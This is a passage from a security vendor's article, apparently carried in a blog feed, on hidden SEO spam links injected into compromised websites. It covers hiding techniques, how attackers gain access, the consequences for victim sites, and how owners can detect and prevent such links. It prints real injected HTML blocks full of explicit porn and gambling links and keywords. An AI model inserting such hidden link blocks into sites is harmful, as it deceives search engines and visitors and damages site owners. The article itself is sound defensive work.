sex</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">bangalore xxx <a href="https://bigassporntrends.com" rel="dofollow" target="_self" title="bigassporntrends.com">bigassporntrends.com</a> sexy video kashmir</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">xnxx sister sex <a href="https://wetwap.info" rel="dofollow" target="_self" title="wetwap.info hd porn streaming">wetwap.info</a> blue film a video</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">tamilschoolsexvideo <a href="https://tubetria.mobi" rel="dofollow" title="tubetria.mobi">tubetria.mobi</a> sex free videos</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">سكس من اجل المال مترجم <a href="https://www.yesexyporn.com/" title="yesexyporn.com فوائد لحس الكس">yesexyporn.com</a> نسوان شرميط</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">kamapishi <a href="https://desisexy.org/" target="_blank" title="desisexy.org free porn gay hd online">desisexy.org</a> savita bhabhi xvideo</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">aflamk2 <a href="https://www.pornvideoswatch.net/" target="_self" title="pornvideoswatch.net">pornvideoswatch.net</a> نيك ثمينات</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">hentaifox futanari <a href="https://www.hentaitale.net/" target="_blank" title="hentaitale.net pisuhame">hentaitale.net</a> hen hentai</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">video sexy wallpaper <a href="https://povporntrends.com" target="_blank">povporntrends.com</a> bengolibf</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">persona 5 hentai manga <a href="https://www.younghentai.net/" rel="dofollow" target="_self" title="younghentai.net oni hentai">younghentai.net</a> toys hentai</div></pre>This example demonstrates a slightly more sophisticated approach to hiding the block containing Black Hat SEO content. It suggests an attempt to bypass the automated search engine filters that easily detect the <span id="urvanov-syntax-highlighter-68f254acc2646705335060" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span><span class="crayon-sy">;</span></span></span> parameter.</p><p>Let us analyze the set of CSS styles: <span id="urvanov-syntax-highlighter-68f254acc2647754305574" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o"><</span><span class="crayon-e">div </span><span class="crayon-v">style</span><span class="crayon-o">=</span><span class="crayon-s">"overflow: auto; position: absolute; height: 0pt; width: 0pt;"</span><span class="crayon-o">></span></span></span>. The properties position: <span id="urvanov-syntax-highlighter-68f254acc2648758738924" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">absolute</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-v">height</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0pt</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-v">width</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0pt</span><span class="crayon-sy">;</span></span></span> remove the block from the visible area of the page, while overflow: auto prevents the content from being displayed even if it exceeds zero dimensions. This makes the links inaccessible to humans, but it does not prevent them from being preserved in the <a href="https://en.wikipedia.org/wiki/Document_Object_Model" target="_blank" rel="noopener">DOM (document object model)</a>. That’s why HTML code scanning systems, such as search engines, are able to see it.</p><p>In addition to the zero dimensions of the block, in this example, just as in the previous one, we see the attribute <span id="urvanov-syntax-highlighter-68f254acc264a594808728" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">rel</span><span class="crayon-o">=</span><span class="crayon-s">"dofollow"</span></span></span>, as well as many links to pornographic websites with relevant keywords.</p><p>The combination of styles that sets the block dimensions to zero is less obvious than <span id="urvanov-syntax-highlighter-68f254acc264b328840541" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span><span class="crayon-sy">;</span></span></span> because the element is technically present in the rendering, although it is not visible to the user. Nevertheless, it is worth noting that modern search engine security algorithms, such as Google Penguin, detect this technique too. To counter this, malicious actors may employ more complex techniques for evading detection. Here is another example:</p><pre class="urvanov-syntax-highlighter-plain-tag"><script src="files/layout/js/slider3d.js?v=0d6651e2"></script><script src="files/layout/js/layout.js?v=51a52ad1"></script><style type="text/css">.ads-gold {height: 280px;overflow: auto;color: transparent;}.ads-gold::-webkit-scrollbar { display: none;}.ads-gold a {color: transparent;}.ads-gold {font-size: 10px;}.ads-gold {height: 0px;overflow: hidden;}</style><div class="ads-gold">Ganhe Rápido nos Jogos Populares do Cassino Online <a href="https://580-bet.com" target="_blank">580bet</a>Cassino <a href="https://bet-7k.com" target="_blank">bet 7k</a>: Diversão e Grandes Vitórias Esperam por VocêAposte e Vença no Cassino <a href="https://leao-88.com" target="_blank">leao</a> – Jogos Fáceis e PopularesJogos Populares e Grandes Prêmios no Cassino Online <a href="https://luck-2.com" target="_blank">luck 2</a>Descubra os Jogos Mais Populares no Cassino <a href="https://john-bet.com" target="_blank">john bet</a> e Ganhe<a href="https://7755-bet.com" target="_blank">7755 bet</a>: Apostas Fáceis, Grandes Oportunidades de VitóriaJogue no Cassino Online <a href="https://cbet-88.com" target="_blank">cbet</a> e Aumente suas Chances de GanharGanhe Prêmios Incríveis com Jogos Populares no Cassino <a href="https://bet7-88.com" target="_blank">bet7</a>Cassino <a href="https://pk55-88.com" target="_blank">pk55</a>: Onde a Sorte Está ao Seu LadoExperimente o Cassino <a href="https://8800-bet.com" target="_blank">8800 bet</a> e Ganhe com Jogos PopularesGanhe Facilmente no Cassino Online <a href="https://doce-88.com" target="_blank">doce</a>Aposte e Vença no Cassino <a href="https://bet-4-br.com" target="_blank">bet 4</a>Jogos Populares e Grandes Premiações na <a href="https://f12--bet.com" target="_blank">f12bet</a>Descubra a Diversão e Vitória no Cassino <a href="https://bet-7-br.com" target="_blank">bet7</a>Aposte nos Jogos Mais Populares do Cassino <a href="https://ggbet-88.com" target="_blank">ggbet</a>Ganhe Prêmios Rápidos no Cassino Online <a href="https://bet77-88.com" target="_blank">bet77</a>Jogos Fáceis e Rápidos no Cassino <a href="https://mrbet-88.com" target="_blank">mrbet</a>Jogue e Ganhe com Facilidade no Cassino <a href="https://bet61-88.com" target="_blank">bet61</a>Cassino <a href="https://tvbet-88.com" target="_blank">tvbet</a>: Onde a Sorte Está Ao Seu LadoAposte nos Melhores Jogos do Cassino Online <a href="https://pgwin-88.com" target="_blank">pgwin</a>Ganhe Grande no Cassino <a href="https://today-88.com" target="_blank">today</a> com Jogos PopularesCassino <a href="https://fuwin-88.com" target="_blank">fuwin</a>: Grandes Vitórias Esperam por VocêExperimente os Melhores Jogos no Cassino <a href="https://brwin-88.com" target="_blank">brwin</a></div></body></pre><p>Aside from the parameters we are already familiar with, which are responsible for concealing a block ( <span id="urvanov-syntax-highlighter-68f254acc264d089610953" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">height</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0px</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">color</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">transparent</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">overflow</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">hidden</span></span></span>), and the name that hints at its contents ( <span id="urvanov-syntax-highlighter-68f254acc264f657409125" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-sy">\</span><span class="crayon-o"><</span><span class="crayon-e">style </span><span class="crayon-v">type</span><span class="crayon-o">=</span><span class="crayon-s">"text/css"</span><span class="crayon-sy">\</span><span class="crayon-o">></span><span class="crayon-sy">.</span><span class="crayon-v">ads</span><span class="crayon-o">-</span><span class="crayon-v">gold</span></span></span>), strings with scripts in this example can be found at the very beginning: <span id="urvanov-syntax-highlighter-68f254acc2650588207053" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-ta"><script </span><span class="crayon-e ">src</span><span class="crayon-o">=</span><span class="crayon-s">"files/layout/js/slider3d.js?v=0d6651e2"</span><span class="crayon-o">></span><span class="crayon-ta"></script></span></span></span> and <span id="urvanov-syntax-highlighter-68f254acc2651392159977" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-ta"><script </span><span class="crayon-e ">src</span><span class="crayon-o">=</span><span class="crayon-s">"files/layout/js/layout.js?v=51a52ad1"</span><span class="crayon-o">></span><span class="crayon-ta"></script></span></span></span>. These indicate that external JavaScript can dynamically control the page content, for example, by adding or changing hidden links, that is, modifying this block in real time.</p><p>This is a more advanced approach than the ones in the previous examples. Yet it is also detected by filters responsible for identifying suspicious manipulations.</p><p>Other parameters and attributes exist that attackers use to conceal a link block. These, however, can also be detected:</p><ul><li>the parameter <span id="urvanov-syntax-highlighter-68f254acc2653397563196" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">visibility</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">hidden</span><span class="crayon-sy">;</span></span></span> can sometimes be seen instead of <span id="urvanov-syntax-highlighter-68f254acc2654921412155" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span><span class="crayon-sy">;</span></span></span>.</li><li>Within <span id="urvanov-syntax-highlighter-68f254acc2655758106867" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">position</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">absolute</span><span class="crayon-sy">;</span></span></span>, the block with hidden links may not have a zero size, but rather be located far beyond the visible area of the page. This can be set, for example, via the property <span id="urvanov-syntax-highlighter-68f254acc2656635163430" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">left</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-cn">9232px</span><span class="crayon-sy">;</span></span></span>, as in the example below.</li></ul><pre class="urvanov-syntax-highlighter-plain-tag"><div style="position: absolute; left: -9232px"><a href="https://romabet.cam/">روما بت</a><br><a href="https://mahbet.cam/">ماه بت</a><br><a href="https://pinbahis.com.co/">پین باهیس</a><br><a href="https://bettingmagazine.org/">بهترین سایت شرط بندی</a><br><a href="https://1betcart.com/">بت کارت</a><br><a href="https:// yasbet.com.co/">یاس بت</a><br><a href="https://yekbet.cam/">یک بت</a><br><a href="https://megapari.cam/">مگاپاری </a><br><a href="https://onjabet.net/">اونجا بت</a><br><a href="https://alvinbet.org/">alvinbet.org</a><br><a href="https://2betboro.com/">بت برو</a><br><a href="https://betfa.cam/">بت فا</a><br><a href="https://betforward.help/">بت فوروارد</a><br><a href="https://1xbete.org/">وان ایکس بت</a><br><a href="https://1win-giris.com.co/">1win giriş</a><br><a href="https://betwiner.org/">بت وینر</a><br><a href="https://4shart.com/">بهترین سایت شرط بندی ایرانی</a><br><a href="https://1xbetgiris.cam">1xbet giriş</a><br><a href="https://1kickbet1.com/">وان کیک بت</a><br><a href="https://winbet-bet.com/">وین بت</a><br><a href="https://ritzobet.org/">ریتزو بت</a><br></pre><h2 id="how-attackers-place-hidden-links-on-other-peoples-websites">How attackers place hidden links on other people’s websites</h2><p>To place hidden links, attackers typically exploit website configuration errors and vulnerabilities. This may be a weak or compromised password for an administrator account, plugins or an engine that have not been updated in a long time, poor filtering of user inputs, or security issues on the hosting provider’s side. Furthermore, attackers may attempt to exploit the human factor, for example, by setting up targeted or mass phishing attacks in the hope of obtaining the website administrator’s credentials.</p><p>Let us examine in detail the various mechanisms through which an attacker gains access to editing a page’s HTML code.</p><ul><li><strong>Compromise of the administrator password</strong>. An attacker may guess the password, use phishing to trick the victim into giving it away, or steal it with the help of malware. Furthermore, the password may be found in a database of leaked credentials. Site administrators frequently use simple passwords for control panel protection or, even worse, leave the default password, thereby simplifying the task for the attacker.<br />After gaining access to the admin panel, the attacker can directly edit the page’s HTML code or install their own plugins with hidden SEO blocks.</li><li><strong>Exploitation of CMS (WordPress, Joomla, Drupal) vulnerabilities</strong>. If the engine or plugins are out of date, attackers use known vulnerabilities (SQL Injection, RCE, or XSS) to gain access to the site’s code. After that, depending on the level of access gained by exploiting the vulnerability, they can modify template files (header.php, footer.php, index.php, etc.), insert invisible blocks into arbitrary site pages, and so on.<br />In SQL injection attacks, the hacker injects their malicious SQL code into a database query. Many websites, from news portals to online stores, store their content (text, product descriptions, and news) in a database. If an SQL query, such as <span id="urvanov-syntax-highlighter-68f254acc2659970557860" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-e ">SELECT *</span><span class="crayon-h"> </span><span class="crayon-e">FROM </span><span class="crayon-e">posts </span><span class="crayon-e">WHERE </span><span class="crayon-v">id</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-s">'$id'</span></span></span> allows passing arbitrary data, the attacker can use the <span id="urvanov-syntax-highlighter-68f254acc265a304808340" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-sy">$</span><span class="crayon-v">id</span></span></span> field to inject their code. This allows the attacker to change the content of records, for example, by inserting HTML with hidden blocks.<br />In RCE (remote code execution) attacks, the attacker gains the ability to run their own commands on the server where the website runs. Unlike SQL injections, which are limited to the database, RCE provides almost complete control over the system. For example, it allows the attacker to create or modify site files, upload malicious scripts, and, of course, inject invisible blocks.<br />In an XSS (cross-site scripting) attack, the attacker injects their JavaScript code directly into the web page by using vulnerable input fields, such as those for comments or search queries. When another user visits this page, the malicious script automatically executes in their browser. Such a script enables the attacker to perform various malicious actions, including stealthily adding a hidden <span id="urvanov-syntax-highlighter-68f254acc265b122062589" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o"><</span><span class="crayon-v">div</span><span class="crayon-o">></span></span></span> block with invisible links to the page. For XSS, the attacker does not need direct access to the server or database, as in the case with SQL injection or RCE; they only need to find a single vulnerability on the website.</li><li><strong>An attack via the hosting provider</strong>. In addition to directly hacking the target website, an attacker may attempt to gain access to the website through the hosting environment. If the hosting provider’s server is poorly secured, there is a risk of it being compromised. Furthermore, if multiple websites or web applications run on the same server, a vulnerability in one of them can jeopardize all other projects. The attacker’s capabilities depend on the level of access to the server. These capabilities may include: injecting hidden blocks into page templates, substituting files, modifying databases, connecting external scripts to multiple websites simultaneously, and so forth. Meanwhile, the website administrator may not notice the problem because the vulnerability is being exploited within the server environment rather than the website code.</li></ul><p>Note that hidden links appearing on a website is not always a sign of a cyberattack. The issue often arises during the development phase, for example, if an illegal copy of a template is downloaded to save money or if the project is executed by an unscrupulous web developer.</p><h2 id="why-attackers-place-hidden-blocks-on-websites">Why attackers place hidden blocks on websites</h2><p>One of the most obvious goals for injecting hidden blocks into other people’s websites is to steal the PageRank from the victim. The more popular and authoritative the website is, the more interesting it is to attackers. However, this does not mean that moderate- or low-traffic websites are safe. As a rule, administrators of popular websites and large platforms do their best to adhere to security rules, so it is not so easy to get close to them. Therefore, attackers may target less popular – and less protected – websites.</p><p>As previously mentioned, this approach to promoting websites is easily detected and blocked by search engines. In the short term, though, attackers still benefit from this: they manage to drive traffic to the websites that interest them until search engine algorithms detect the violation.</p><p>Even though the user does not see the hidden block and cannot click the links, attackers can use scripts to boost traffic to their websites. One possible scenario involves JavaScript creating an iframe in the background or sending an HTTP request to the website from the hidden block, which then receives information about the visit.</p><p>Hidden links can lead not just to pornographic or other questionable websites but also to websites with low-quality content whose sole purpose is to be promoted and subsequently sold, or to phishing and malicious websites. In more sophisticated schemes, the script that provides “visits” to such websites may load malicious code into the victim’s browser.</p><p>Finally, hidden links allow attackers to lower the reputation of the targeted website and harm its standing with search engines. This threat is especially relevant in light of the fact that algorithms such as Google Penguin penalize websites hosting questionable links. Attackers may use these techniques as a tool for unfair competition, hacktivism, or any other activity that involves discrediting certain organizations or individuals.</p><p>Interestingly, in 2025, we have more frequently encountered hidden blocks with links to pornographic websites and online casinos on various legitimate websites. With low confidence, we can suggest that this is partly due to the development of neural networks, which make it easy to automate such attacks, and partly due to the regular <a href="https://developers.google.com/search/docs/appearance/spam-updates" target="_blank" rel="noopener">updates to Google’s anti-spam systems</a>, the latest of which was completed at the end of September 2025: attackers may have rushed to maximize their gains before the search engine made it a little harder for them.</p><h2 id="consequences-for-the-victim-website">Consequences for the victim website</h2><p>The consequences for the victim website can vary in severity. At a minimum, the presence of hidden links placed by unauthorized parties hurts search engine reputation, which may lead to lower search rankings or even complete exclusion from search results. However, even without any penalties, the links disrupt the internal linking structure because they lead to external websites and pass on a portion of the victim’s weight to them. This negatively impacts the rankings of key pages.</p><p>Although unseen by visitors, hidden links can be discovered by external auditors, content analysis systems, or researchers who report such findings in public reports. This is something that can undermine trust in the website. For example, sites where our categorization engine detects links to pornography pages will be classified as “Adult content”. Consequently, all of our clients who use web filters to block this category will be unable to visit the website. Furthermore, information about a website’s category is published on our <a href="https://opentip.kaspersky.com/" target="_blank" rel="noopener">Kaspersky Threat Intelligence Portal</a> and available to anyone wishing to look up its reputation.</p><p>If the website is being used to distribute illegal or fraudulent content, the issue enters the legal realm, with the owner potentially facing lawsuits from copyright holders or regulators. For example, if the links lead to websites that distribute pirated content, the site may be considered an intermediary in copyright infringement. If the hidden block contains malicious scripts or automatic redirects to questionable websites, such as phishing pages, the owner can be charged with fraud or some other cybercrime.</p><h2 id="how-to-detect-a-hidden-link-block-on-your-website">How to detect a hidden link block on your website</h2><p>The simplest and most accessible method for any user to check a website for a hidden block is to view its source code in the browser. This is very easy to do. Navigate to the website, press Control+U, and the website’s code will open in the next tab. Search (Control+F) the code for the following keywords: <span id="urvanov-syntax-highlighter-68f254acc265d572507992" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">visibility</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">hidden</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">opacity</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">height</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">width</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">position</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">absolute</span></span></span>. In addition, you can check for keywords that are characteristic of the hidden content itself. When it comes to links that point to adult or gambling sites, you should look for <span id="urvanov-syntax-highlighter-68f254acc2661050478198" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">porn</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">sex</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">casino</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">card</span></span></span>, and the like.</p><p>A slightly more complex method is using web developer tools to investigate the DOM for invisible blocks. After the page fully loads, open DevTools (F12) in the browser and go to the Elements tab. Search (Control+F) for keywords such as <span id="urvanov-syntax-highlighter-68f254acc2662393249267" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o"><</span><span class="crayon-v">a</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">iframe</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">hidden</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-v">opacity</span></span></span>. Hover your cursor over suspicious elements in the code so the browser highlights their location on the page. If the block occupies zero area or is located outside the visible area, that is an indicator of a hidden element. Check the Computed tab for the selected element; there, you can see the applied CSS styles and confirm that it is hidden from the user’s view.</p><p>You can also utilize specialized SEO tools. These are typically third-party solutions that scan website SEO data and generate reports. They can provide a report about suspicious links as well. Few of them are free, but when selecting a tool, you should be guided primarily by the vendor’s reputation rather than price. It is better to use tried-and-true, well-known services that are known to be free of malicious or questionable payloads. Examples of these trusted services include Google Search Console, Bing Webmaster Tools, OpenLinkProfiler, and SEO Minion.</p><p>Another way to discover hidden SEO spam on a website is to check the CMS itself and its files. First, you should scan the database tables for suspicious HTML tags with third-party links that may have been inserted by attackers, and also carefully examine the website’s template files (header.php, footer.php, and index.php) and included modules for unfamiliar or suspicious code. Pay particular attention to encrypted insertions, unclear scripts, or links that should not originally be present in the website’s structure.</p><p>Additionally, you can look up your website’s reputation on the <a href="https://opentip.kaspersky.com/" target="_blank" rel="noopener">Kaspersky Threat Intelligence Portal</a>. If you find it in an uncharacteristic category – typically “Adult content”, “Sexually explicit”, or “Gambling” – there is a high probability that there is a hidden SEO spam block embedded in your website.</p><h2 id="how-to-protect-your-website">How to protect your website</h2><p>To prevent hidden links from appearing on your website, avoid unlicensed templates, themes, and other pre-packaged solutions. The entire site infrastructure must be built only on licensed and official solutions. The same principle applies to webmasters and companies you hire to build your website: we recommend checking their work for hidden links, but also for vulnerabilities in general. Never cut corners when it comes to security.</p><p>Keep your CMS, themes, and plugins up to date, as new versions often patch known vulnerabilities that attackers can exploit. Delete any unused plugins and themes, if any. The less unnecessary components are installed, the lower the risk of an exploit in one of the extensions, plugins, and themes. It is worth noting that this risk never disappears completely – it is still there even if you have a minimal set of components as long as they are outdated or poorly secured.</p><p>To protect files and the server, it is important to properly configure access permissions. On servers running Linux and other Unix-like systems, use <strong>644</strong> for files and <strong>755</strong> for folders. This means that the owner can open folders, and read and modify folders and files, while the group and other users can only read files and open folders. If write access is not necessary, for example in template folders, forbid it altogether to lower the risk of malicious actors making unauthorized changes. Furthermore, you must set up regular, automatic website backups so that data can be quickly restored if there is an issue.</p><p>Additionally, it is worth using web application firewalls (WAFs), which help block malicious requests and protect the site from external attacks. This solution is available in <a href="https://www.kaspersky.com/small-to-medium-business-security/ddos-protection?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kddosp____debce7fd29f69a6d" target="_blank" rel="noopener">Kaspersky DDoS Protection</a>.</p><p>To protect the administrator panel, use only strong passwords and 2FA (Two-Factor Authentication) at all times. You would be well-advised to restrict access to the admin panel by IP address if you can. Only a limited group of individuals should be granted admin privileges.</p>]]></content:encoded> <wfw:commentRss>https://securelist.com/seo-spam-hidden-links/117782/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content 